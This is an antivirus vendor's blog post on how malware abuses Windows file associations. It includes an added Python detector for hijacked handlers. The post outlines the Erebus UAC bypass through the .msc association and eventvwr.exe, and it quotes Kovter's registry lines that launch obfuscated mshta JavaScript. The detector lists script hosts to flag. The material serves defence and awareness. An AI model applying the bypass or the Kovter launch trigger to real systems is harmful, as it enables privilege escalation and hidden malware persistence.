
Extending our discussion of extensions


Thursday, September 21, 2017

We’ve already described how cybercriminals use file extensions to cheat users—see the issue “Three letters after the dot”. But our discussion there about the opportunities extensions give attackers was far from exhaustive.

As we already mentioned, the operating system associates an extension with certain actions that will be performed if a user clicks on the file. For example, if the file in question has the “.png” extension, you’ll likely launch a program for viewing or editing graphics files. What will happen if, for example, you click on a file that has the ".torrent" extension?

Program.MediaGet installs itself as the default torrent client by modifying the “.torrent” file associations in the registry.

Program.Zona verifies the settings associated with “.torrent” files, and if Zona is not the default program for opening torrent files, it offers to associate itself with them.

In other words, by clicking on such a file, you’ll launch a malicious program. And most likely you’ll also confirm the application’s launch, thinking that you are opening a torrent.

Of course, the Windows user account control (UAC) system will show what’s actually launching, but fraudsters can use extensions to bypass it.

The method for bypassing UAC is below.

  1. Erebus copies itself to the system folder as a file with a random name and then modifies the Windows registry so that the association for the “.msc” file extension executes this newly created, randomly named file.
  2. After this, Erebus launches eventvwr.exe (Event Viewer), which automatically opens eventvwr.msc.
  3. As the “.msc” extension is no longer associated with mmc.exe (Microsoft Management Console), eventvwr.exe launches the ransomware file instead. Event Viewer runs in elevated mode, so the executable inherits the same privileges, which allows it to bypass UAC.

https://twitter.com/malwrhunterteam/status/828957753121112064

Cybercriminals take advantage of the fact that a number of system programs are launched with elevated privileges, and arrange for malicious files to be run in their place or through the file associations those programs rely on.

How is the association made? It’s pretty simple. For example, the fileless Trojan.Kovter.297 registers the file extensions it needs and uses them as switches (triggers) for its own launch.

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"
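As an added example (not code from the page or from Doctor Web), here is a Python check that parses registry-write log lines of the form shown above and flags file associations that look hijacked: either the handler runs a script host (the Kovter pattern) or “.msc” no longer resolves to mmc.exe (the Erebus pattern). The two Kovter lines are the ones quoted above; the “.msc” and “.txt” lines are constructed, and the Temp path is a placeholder.

```python
import re

# Registry-write log lines in the format quoted above. The two Kovter lines are
# the ones from the page; the .msc hijack and the benign .txt handler are
# constructed for illustration (the Temp path is a placeholder, not a real sample).
SAMPLE_LOG = r'''
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.msc" Value="" Type=1 Data=mscfile\0
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\mscfile\shell\open\command" Value="" Type=1 Data="C:\Windows\Temp\PLACEHOLDER.exe" "%1"
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.txt" Value="" Type=1 Data=txtfile\0
SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\txtfile\shell\open\command" Value="" Type=1 Data=notepad.exe "%1"
'''

LINE_RE = re.compile(r'Key="([^"]+)"\s+Value="[^"]*"\s+Type=\d+\s+Data=(.*)$')
# Script hosts that turn a file association into an arbitrary-code launch trigger.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "javascript:", "vbscript:")
# Extensions whose handler must stay the expected system program (auto-elevated consumers).
EXPECTED_HANDLER = {".msc": "mmc.exe"}

def parse_associations(log: str) -> tuple[dict[str, str], dict[str, str]]:
    """Map extension -> ProgID and ProgID -> open command from per-user Classes writes."""
    ext_to_progid: dict[str, str] = {}
    progid_to_cmd: dict[str, str] = {}
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        data = m.group(2).strip().removesuffix("\\0")  # drop the logged NUL terminator
        parts = m.group(1).rsplit("_CLASSES\\", 1)      # keep only the path below ...\Classes\
        if len(parts) != 2:
            continue
        rel = parts[1]
        if rel.startswith("."):
            ext_to_progid[rel.lower()] = data
        elif rel.lower().endswith("\\shell\\open\\command"):
            progid_to_cmd[rel.split("\\", 1)[0]] = data
    return ext_to_progid, progid_to_cmd

def find_hijacked_associations(log: str) -> list[tuple[str, str, str]]:
    """Return (extension, command, reason) for associations that look like launch triggers."""
    ext_to_progid, progid_to_cmd = parse_associations(log)
    findings = []
    for ext, progid in ext_to_progid.items():
        cmd = progid_to_cmd.get(progid, "")
        low = cmd.lower()
        if any(host in low for host in SCRIPT_HOSTS):
            findings.append((ext, cmd, "handler runs a script host"))
        elif ext in EXPECTED_HANDLER and EXPECTED_HANDLER[ext] not in low:
            findings.append((ext, cmd, f"{ext} no longer opened by {EXPECTED_HANDLER[ext]}"))
    return findings
```

Run against a real export of HKCU\Software\Classes, the same logic surfaces the per-user overrides that UAC prompts alone will not show.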

The most harmless thing virus writers probably do with extensions involves the file association created by malware to notify victims they need to pay a ransom.

Trojan.Encoder.12950 places a script in the system that will display a message containing demands, and adds it to the associations for the “*.Dcry” extension.

#Windows #malware

The Anti-virus Times recommends

  1. The Windows UAC system displays all application launch requests. So don't forget to keep it enabled.
  2. Read UAC system messages attentively to understand exactly what a file is trying to launch.
  3. Use an anti-virus. Only it can keep track of all the tricks hackers come up with.
